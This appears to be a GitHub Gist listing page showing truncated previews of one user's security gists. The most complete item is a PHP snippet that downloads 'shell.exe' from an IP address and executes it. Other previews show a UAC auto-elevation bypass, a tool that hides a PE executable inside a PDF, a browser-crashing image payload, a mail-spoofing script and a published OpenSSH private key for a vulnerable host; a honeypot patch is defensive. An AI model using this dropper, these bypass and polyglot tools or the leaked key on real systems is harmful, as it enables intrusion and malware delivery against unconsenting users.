Alexander Rausch GitMirar
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $bd = "http://192.168.22.31/shell.exe"; | |
| $data = file_get_contents($bd); | |
| file_put_contents("t.exe", $data); | |
| exec("t.exe"); | |
| ?> |
GitMirar
/ HookPort.c
Created
January 31, 2018 11:53
HookPort.sys ripped from http://www.aihuau.com/a/25101014/229166.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| 直接粘源代码: | |
| 里面实现了一个简易HookPort驱动,并在XPSP3下通过。并且实现了大多数关键功能。 | |
| 由于HookPort里面有太多的重复性劳动,所以对于Hook函数我只写了一个hookntcreatekey函数的原型,其他都类似。 | |
| 没有注释,大家凑合看吧。 | |
| */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * IFileOperation auto-elevation | |
| * by Leo Davidson and @hFireF0X | |
| * src: http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643&p=28249#p28249 | |
| */ | |
| void TestCopy() | |
| { | |
| BOOL cond = FALSE; |
GitMirar
/ PDF PE fuse
Created
January 29, 2016 04:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import os, sys | |
| PDF_STAOBJ_STASTR = '\x0A\x25\x50\x44\x46\x2D\x31\x2E\x34\x0A\x6F\x62\x6A\x3C\x3C\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0A' | |
| PDF_ENDSTR_ENDOBJ = '\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\x0a\x65\x6e\x64\x6f\x62\x6a\x0a' | |
| def main(): | |
| patched_pdf = sys.argv[1].replace(".exe", ".pdf") | |
| if (len(sys.argv) != 3): |
GitMirar
/ ctor function (like dllmain on linux)
Created
January 27, 2016 01:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| static void ansisec_init(void) __attribute__((constructor)); | |
| static void ansisec_init(void) | |
| { ... } |
GitMirar
/ ssh_host_ed25519_key.pub (Hetzner vuln key)
Created
January 1, 2016 01:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJOYLHteNAiX6l84+X55LezpV887OnaK4dhVi2ckrvx0 root@Debian-80-jessie-64-minimal |
GitMirar
/ ssh_host_ed25519_key (Hetzner vuln key)
Created
January 1, 2016 01:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -----BEGIN OPENSSH PRIVATE KEY----- | |
| b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW | |
| QyNTUxOQAAACCTmCx7XjQIl+pfOPl+eS3s6VfPOzp2iuHYVYtnJK78dAAAAKgnsGKKJ7Bi | |
| igAAAAtzc2gtZWQyNTUxOQAAACCTmCx7XjQIl+pfOPl+eS3s6VfPOzp2iuHYVYtnJK78dA | |
| AAAED4MbIHybrLHQinYFxqc1ohxrPF9/QH/JUNrtXgAJQd8ZOYLHteNAiX6l84+X55Lezp | |
| V887OnaK4dhVi2ckrvx0AAAAIHJvb3RARGViaWFuLTgwLWplc3NpZS02NC1taW5pbWFsAQ | |
| IDBAU= | |
| -----END OPENSSH PRIVATE KEY----- |
GitMirar
/ Weird stuff crashing firefox from gomozajige
Last active
April 9, 2016 11:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title>JS Bin</title> | |
| </head> | |
| <body> | |
| <img src="data:image/gif;base64,R0lGODlh/v/7/+eAAI+eoM7nerbvBrXlxdBixAChPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAIAAAAAACAAACAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
GitMirar
/ sendmail.py
Last active
August 29, 2015 13:58
Script for mail spoofing audit w. auth over STARTTLS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import smtplib | |
| import email.utils | |
| from email.mime.text import MIMEText | |
| import getpass | |
| def main(): | |
| servername = raw_input('Mail server name: ') | |
| serverport = raw_input('Server port: ') | |
| username = raw_input('Mail user name: ') |
GitMirar
/ openssh-6.5p1_honeypot.diff
Last active
August 29, 2015 13:58
patch for openssh-6.5p1 to record ip username and pw of brute-force attacker (honeypot)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- auth-passwd.c.1 2014-04-22 17:59:18.105763443 +0200 | |
| +++ auth-passwd.c.2 2014-04-22 18:00:06.509810550 +0200 | |
| @@ -45,6 +45,8 @@ | |
| #include <string.h> | |
| #include <stdarg.h> | |
| +#include <time.h> | |
| + | |
| #include "packet.h" | |
| #include "buffer.h" |
NewerOlder